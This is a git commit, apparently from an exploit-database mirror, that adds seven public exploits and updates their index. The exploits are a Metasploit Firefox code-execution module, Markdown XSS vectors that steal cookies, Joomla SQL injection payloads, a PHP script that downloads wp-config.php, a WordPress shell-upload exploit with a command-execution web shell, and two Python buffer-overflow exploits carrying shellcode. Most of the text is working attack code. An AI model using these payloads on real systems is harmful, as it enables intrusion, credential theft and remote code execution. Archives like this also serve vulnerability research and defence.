DB: 2015-03-25
7 new exploits
This commit is contained in:
parent
b607ee5335
commit
8f1f948d2a
8 changed files with 524 additions and 1 deletions
|
@ -32295,7 +32295,6 @@ id,file,description,date,author,platform,type,port
|
|||
35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
|
||||
35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
|
||||
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
|
||||
35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
|
||||
35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
|
||||
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
|
||||
35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
|
||||
|
@ -32883,6 +32882,10 @@ id,file,description,date,author,platform,type,port
|
|||
36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
|
||||
36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
|
||||
36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0
|
||||
36463,platforms/php/webapps/36463.txt,"Telescope <= 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0
|
||||
36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection Vulnerability",2015-03-22,"Manish Tanwar",php,webapps,0
|
||||
36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
|
||||
36466,platforms/php/webapps/36466.txt,"Wordpress Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
|
||||
36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting Vulnerability",2011-12-19,G13,php,webapps,0
|
||||
36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection Vulnerability",2011-12-20,CoBRa_21,php,webapps,0
|
||||
36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 'show_errors' Parameter HTML Injection Vulnerability",2011-12-20,"Stefan Schurtz",php,webapps,0
|
||||
|
@ -32892,3 +32895,6 @@ id,file,description,date,author,platform,type,port
|
|||
36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-21,Vulnerability-Lab,hardware,remote,0
|
||||
36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption Vulnerability",2011-12-21,"Vulnerability Research Laboratory",windows,local,0
|
||||
36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
|
||||
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
|
||||
36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
115
platforms/multiple/remote/36480.rb
Executable file
115
platforms/multiple/remote/36480.rb
Executable file
|
@ -0,0 +1,115 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection',
|
||||
'Description' => %q{
|
||||
This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect
|
||||
component and gaining a reference to the privileged chrome:// window. This exploit
|
||||
requires the user to click anywhere on the page to trigger the vulnerability.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'joev' # discovery and metasploit module
|
||||
],
|
||||
'DisclosureDate' => "Jan 20 2014",
|
||||
'References' => [
|
||||
['CVE', '2014-8636'],
|
||||
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],
|
||||
['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]
|
||||
|
||||
],
|
||||
'Targets' => [
|
||||
[
|
||||
'Universal (Javascript XPCOM Shell)', {
|
||||
'Platform' => 'firefox',
|
||||
'Arch' => ARCH_FIREFOX
|
||||
}
|
||||
],
|
||||
[
|
||||
'Native Payload', {
|
||||
'Platform' => %w{ java linux osx solaris win },
|
||||
'Arch' => ARCH_ALL
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:ua_name => HttpClients::FF,
|
||||
:ua_ver => lambda { |ver| ver.to_i.between?(31, 34) }
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
send_response_html(cli, generate_html(target_info))
|
||||
end
|
||||
|
||||
def default_html
|
||||
"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
|
||||
end
|
||||
|
||||
def generate_html(target_info)
|
||||
key = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
frame = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
r = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
|
||||
|
||||
js = js_obfuscate %Q|
|
||||
var opts = #{JSON.unparse(opts)};
|
||||
var key = opts['#{key}'];
|
||||
var props = {};
|
||||
props.has = function(n){
|
||||
if (!window.top.x && n=='nodeType') {
|
||||
window.top.x=window.open("chrome://browser/content/browser.xul", "x",
|
||||
"chrome,,top=-9999px,left=-9999px,height=100px,width=100px");
|
||||
if (window.top.x) {
|
||||
Object.setPrototypeOf(document, pro);
|
||||
setTimeout(function(){
|
||||
x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
|
||||
|
||||
setTimeout(function(){
|
||||
x.messageManager.loadFrameScript('data:,'+key, false);
|
||||
setTimeout(function(){
|
||||
x.close();
|
||||
}, 100)
|
||||
}, 100)
|
||||
}, 100);
|
||||
}
|
||||
}
|
||||
}
|
||||
var pro = Object.getPrototypeOf(document);
|
||||
Object.setPrototypeOf(document, Proxy.create(props));
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
#{datastore['CONTENT'] || default_html}
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
end
|
||||
end
|
27
platforms/php/webapps/36463.txt
Executable file
27
platforms/php/webapps/36463.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Persistent XSS via Markdown on Telescope <= 0.9.2
|
||||
# Date: Aug 22 2014
|
||||
# Exploit Author: shubs
|
||||
# Vendor Homepage: http://www.telescopeapp.org/
|
||||
# Software Link: https://github.com/TelescopeJS/Telescope
|
||||
# Version: <= 0.9.2
|
||||
# CVE : CVE-2014-5144
|
||||
|
||||
Telescope 0.9.2 and below suffer from a persistent cross site scripting
|
||||
vulnerability due to the lack of input sanitisation and validation
|
||||
performed when parsing markdown user input. An authenticated user can
|
||||
include links, images, code blocks and more through markdown, in the form
|
||||
of comments, posts or replies and more.
|
||||
|
||||
As an example, the following vectors below can be used in comments, posts
|
||||
or replies to trigger the XSS:
|
||||
|
||||
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
|
||||
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
|
||||
|
||||
Once posted as comments, the above markdown is converted to links without
|
||||
any sanitisation. When such links are clicked, the vector is executed
|
||||
successfully.
|
||||
|
||||
Screenshots:
|
||||
http://i.imgur.com/6SQgUYd.png
|
||||
http://i.imgur.com/6VeZasj.png
|
71
platforms/php/webapps/36464.txt
Executable file
71
platforms/php/webapps/36464.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
##################################################################################################
|
||||
#Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability
|
||||
#Author : Manish Kishan Tanwar AKA error1046
|
||||
#Vendor Link : http://demo.web-dorado.com/spider-faq.html
|
||||
#Date : 21/03/2015
|
||||
#Discovered at : IndiShell Lab
|
||||
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
|
||||
#Discovered At : Indishell Lab
|
||||
##################################################################################################
|
||||
|
||||
////////////////////////
|
||||
/// Overview:
|
||||
////////////////////////
|
||||
|
||||
|
||||
joomla component Spider FAQ is not filtering data in theme and Itemid parameters
|
||||
and hence affected from SQL injection vulnerability
|
||||
|
||||
///////////////////////////////
|
||||
// Vulnerability Description:
|
||||
///////////////////////////////
|
||||
vulnerability is due to theme and Itemid parameter
|
||||
|
||||
////////////////
|
||||
/// POC ////
|
||||
///////////////
|
||||
|
||||
POC image=http://oi57.tinypic.com/2rh1zk7.jpg
|
||||
|
||||
SQL Injection in theme parameter
|
||||
=================================
|
||||
|
||||
Use error based double query injection with theme parameter
|
||||
Like error based double query injection for exploiting username --->
|
||||
and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
|
||||
|
||||
Injected Link--->
|
||||
http://website.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4 and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - &searchform=1&expand=0&Itemid=109
|
||||
|
||||
|
||||
SQL Injection in Itemid parameter
|
||||
=================================
|
||||
|
||||
Itemid Parameter is exploitable using xpath injection
|
||||
|
||||
User extraction payload
|
||||
------------------------
|
||||
' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- -
|
||||
|
||||
crafted URL--->
|
||||
http://localhostm/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- -
|
||||
|
||||
Table extraction
|
||||
-----------------
|
||||
' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- -
|
||||
|
||||
Crafted URL---->
|
||||
http://localhost/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- -
|
||||
|
||||
--==[[ Greetz To ]]==--
|
||||
############################################################################################
|
||||
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
|
||||
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
|
||||
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
|
||||
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
|
||||
#############################################################################################
|
||||
--==[[Love to]]==--
|
||||
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
|
||||
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
|
||||
--==[[ Special Fuck goes to ]]==--
|
||||
<3 suriya Cyber Tyson <3
|
117
platforms/php/webapps/36466.txt
Executable file
117
platforms/php/webapps/36466.txt
Executable file
|
@ -0,0 +1,117 @@
|
|||
# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
|
||||
# Date: 26-10-2014
|
||||
# Software Link: https://wordpress.org/plugins/wpmarketplace/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: http://twitter.com/KacperSzurek
|
||||
# Website: http://security.szurek.pl/
|
||||
# Category: webapps
|
||||
# CVE: CVE-2014-9013 and CVE-2014-9014
|
||||
|
||||
1. Description
|
||||
|
||||
Anyone can run user defined function because of call_user_func.
|
||||
|
||||
File: wpmarketplace\libs\cart.php
|
||||
|
||||
function ajaxinit(){
|
||||
if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
|
||||
if(function_exists($_POST['execute']))
|
||||
call_user_func($_POST['execute'],$_POST);
|
||||
else
|
||||
echo __("function not defined!","wpmarketplace");
|
||||
die();
|
||||
}
|
||||
}
|
||||
|
||||
http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
$file = '../../../wp-config.php';
|
||||
$url = 'http://wordpress-url/';
|
||||
$user = 'userlogin';
|
||||
$email = 'useremail@email.email';
|
||||
$pass = 'password';
|
||||
$cookie = "/cookie.txt";
|
||||
|
||||
$ckfile = dirname(__FILE__) . $cookie;
|
||||
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
|
||||
|
||||
// Register
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
|
||||
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
|
||||
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
|
||||
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($ch, CURLOPT_POST, 1);
|
||||
curl_setopt($ch,
|
||||
CURLOPT_POSTFIELDS,
|
||||
array(
|
||||
'register_form' => 'register',
|
||||
'reg[user_login]' => $user,
|
||||
'reg[user_email]' => $email,
|
||||
'reg[user_pass]' => $pass
|
||||
));
|
||||
$content = curl_exec($ch);
|
||||
if (!preg_match("/success/i", $content)) {
|
||||
die("Cannot register");
|
||||
}
|
||||
// Log in
|
||||
curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
|
||||
curl_setopt($ch,
|
||||
CURLOPT_POSTFIELDS,
|
||||
array(
|
||||
'log' => $user,
|
||||
'pwd' => $pass,
|
||||
'wp-submit' => 'Log%20In'
|
||||
));
|
||||
$content = curl_exec($ch);
|
||||
if (!preg_match('/adminmenu/i', $content)) {
|
||||
die("Cannot login");
|
||||
}
|
||||
// Add subscriber as plugin admin
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch,
|
||||
CURLOPT_POSTFIELDS,
|
||||
array(
|
||||
'action' => 'wpmp_pp_ajax_call',
|
||||
'execute' => 'wpmp_save_settings',
|
||||
'_wpmp_settings[user_role][]' => 'subscriber'
|
||||
));
|
||||
$content = curl_exec($ch);
|
||||
if (!preg_match('/Settings Saved Successfully/i', $content)) {
|
||||
die("Cannot set role");
|
||||
}
|
||||
// Request noonce
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch,
|
||||
CURLOPT_POSTFIELDS,
|
||||
array(
|
||||
'action' => 'wpmp_pp_ajax_call',
|
||||
'execute' => 'wpmp_front_add_product'
|
||||
));
|
||||
$content = curl_exec($ch);
|
||||
preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
|
||||
if (strlen($nonce[1]) < 2) {
|
||||
die("Cannot get nonce");
|
||||
}
|
||||
// Set file to download
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch,
|
||||
CURLOPT_POSTFIELDS,
|
||||
array(
|
||||
'__product_wpmp' => $nonce[1],
|
||||
'post_type' => 'wpmarketplace',
|
||||
'id' => '123456',
|
||||
'wpmp_list[base_price]' => '0',
|
||||
'wpmp_list[file][]' => $file
|
||||
));
|
||||
$content = curl_exec($ch);
|
||||
header("Location: ".$url."?wpmpfile=123456");
|
||||
|
||||
3. Solution:
|
||||
|
||||
Update to version 2.4.1
|
||||
|
||||
https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip
|
92
platforms/php/webapps/36478.php
Executable file
92
platforms/php/webapps/36478.php
Executable file
|
@ -0,0 +1,92 @@
|
|||
<?php
|
||||
###########################################
|
||||
#-----------------------------------------#
|
||||
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
|
||||
#-----------------------------------------#
|
||||
# *----------------------------* #
|
||||
# K |....##...##..####...####....| . #
|
||||
# h |....#...#........#..#...#...| A #
|
||||
# a |....#..#.........#..#....#..| N #
|
||||
# l |....###........##...#.....#.| S #
|
||||
# E |....#.#..........#..#....#..| e #
|
||||
# D |....#..#.........#..#...#...| u #
|
||||
# . |....##..##...####...####....| r #
|
||||
# *----------------------------* #
|
||||
#-----------------------------------------#
|
||||
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
|
||||
#-----------------------------------------#
|
||||
###########################################
|
||||
# >> D_x . Made In Algeria . x_Z << #
|
||||
###########################################
|
||||
#
|
||||
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
|
||||
#
|
||||
# [>] Author : KedAns-Dz
|
||||
# [+] E-mail : ked-h (@hotmail.com)
|
||||
# [+] FaCeb0ok : fb.me/K3d.Dz
|
||||
# [+] TwiTter : @kedans
|
||||
#
|
||||
# [#] Platform : PHP / WebApp
|
||||
# [+] Cat/Tag : File Upload / Code Exec
|
||||
#
|
||||
# [<] <3 <3 Greetings t0 Palestine <3 <3
|
||||
# [!] Vendor : http://www.inboundio.com
|
||||
#
|
||||
###########################################
|
||||
#
|
||||
# [!] Description :
|
||||
#
|
||||
# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability
|
||||
# remote attacker can upload file/shell/backdoor and exec commands.
|
||||
#
|
||||
####
|
||||
# Lines (6... to 20) : csv_uploader.php
|
||||
####
|
||||
#
|
||||
# ExpLO!T :
|
||||
# -------
|
||||
|
||||
$postData = array();
|
||||
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
|
||||
|
||||
$dz = curl_init();
|
||||
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
|
||||
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
|
||||
curl_setopt($dz, CURLOPT_POST, 1);
|
||||
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
|
||||
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
|
||||
$buf = curl_exec ($dz);
|
||||
curl_close($dz);
|
||||
unset($dz);
|
||||
echo $buf;
|
||||
|
||||
/*
|
||||
[!] creat your shell file =>
|
||||
_ k3dz.php :
|
||||
|
||||
<?php system($_GET['dz']); ?>
|
||||
|
||||
[>] Post the exploit
|
||||
[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
|
||||
[+] Or upload what you whant ^_^ ...
|
||||
|
||||
*/
|
||||
|
||||
####
|
||||
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
|
||||
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
|
||||
#---------------------------------------------------------------
|
||||
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
|
||||
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
|
||||
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
|
||||
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
|
||||
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
|
||||
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
|
||||
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
|
||||
####
|
||||
|
||||
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html
|
||||
|
||||
?>
|
||||
|
||||
|
31
platforms/windows/local/36465.py
Executable file
31
platforms/windows/local/36465.py
Executable file
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
#[+] Author: TUNISIAN CYBER
|
||||
#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
|
||||
#[+] Date: 20-03-2015
|
||||
#[+] Type: Local Exploits
|
||||
#[+] Tested on: WinXp/Windows 7 Pro
|
||||
#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
|
||||
#[+] Friendly Sites: sec4ever.com
|
||||
#[+] Twitter: @TCYB3R
|
||||
|
||||
## EDB Note: Didn't work with Windows 7.
|
||||
|
||||
from struct import pack
|
||||
file="evilfile.wav"
|
||||
junk="\x41"*4112
|
||||
eip = pack('<I',0x7C9D30D7)
|
||||
nops = "\x90" * 3
|
||||
#Calc.exe Shellcode
|
||||
#POC:http://youtu.be/_uvHKonqO2g
|
||||
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
|
||||
"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
|
||||
"\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
|
||||
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd"
|
||||
"\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8"
|
||||
"\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5"
|
||||
"\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
|
||||
"\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")
|
||||
writeFile = open (file, "w")
|
||||
writeFile.write(junk+eip+nops+shellcode)
|
||||
writeFile.close()
|
64
platforms/windows/remote/36477.py
Executable file
64
platforms/windows/remote/36477.py
Executable file
|
@ -0,0 +1,64 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
|
||||
In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
|
||||
address and then used backward jumping to jump to a long jump that eventually land in my shellcode.
|
||||
|
||||
Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)
|
||||
|
||||
My twitter: @fady_osman
|
||||
My youtube: https://www.youtube.com/user/cutehack3r
|
||||
'''
|
||||
|
||||
import socket
|
||||
import sys
|
||||
s = socket.socket() # Create a socket object
|
||||
if(len(sys.argv) < 3):
|
||||
print "[x] Please enter an IP and port to listen to."
|
||||
print "[x] " + sys.argv[0] + " ip port"
|
||||
exit()
|
||||
host = sys.argv[1] # Ip to listen to.
|
||||
port = int(sys.argv[2]) # Reserve a port for your service.
|
||||
s.bind((host, port)) # Bind to the port
|
||||
print "[*] Listening on port " + str(port)
|
||||
s.listen(5) # Now wait for client connection.
|
||||
c, addr = s.accept() # Establish connection with client.
|
||||
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
|
||||
print(('[*] Sending the payload first time', addr))
|
||||
c.recv(1024)
|
||||
#seh and nseh.
|
||||
buf = ""
|
||||
buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
|
||||
buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
|
||||
buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
|
||||
buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
|
||||
buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
|
||||
buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
|
||||
buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
|
||||
buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
|
||||
buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
|
||||
buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
|
||||
buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
|
||||
buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
|
||||
buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
|
||||
buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
|
||||
buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
|
||||
buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
|
||||
buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
|
||||
buf += "\x8c\xcd\x11\xc2\x37\x12"
|
||||
|
||||
jmplong = "\xe9\x85\xe9\xff\xff"
|
||||
nseh = "\xeb\xf9\x90\x90"
|
||||
# Partially overwriting the seh record (nulls are ignored).
|
||||
seh = "\x3b\x58\x00\x00"
|
||||
buflen = len(buf)
|
||||
response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000
|
||||
c.send(response)
|
||||
c.close()
|
||||
c, addr = s.accept() # Establish connection with client.
|
||||
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
|
||||
print(('[*] Sending the payload second time', addr))
|
||||
c.recv(1024)
|
||||
c.send(response)
|
||||
c.close()
|
||||
s.close()
|
Loading…
Add table
Reference in a new issue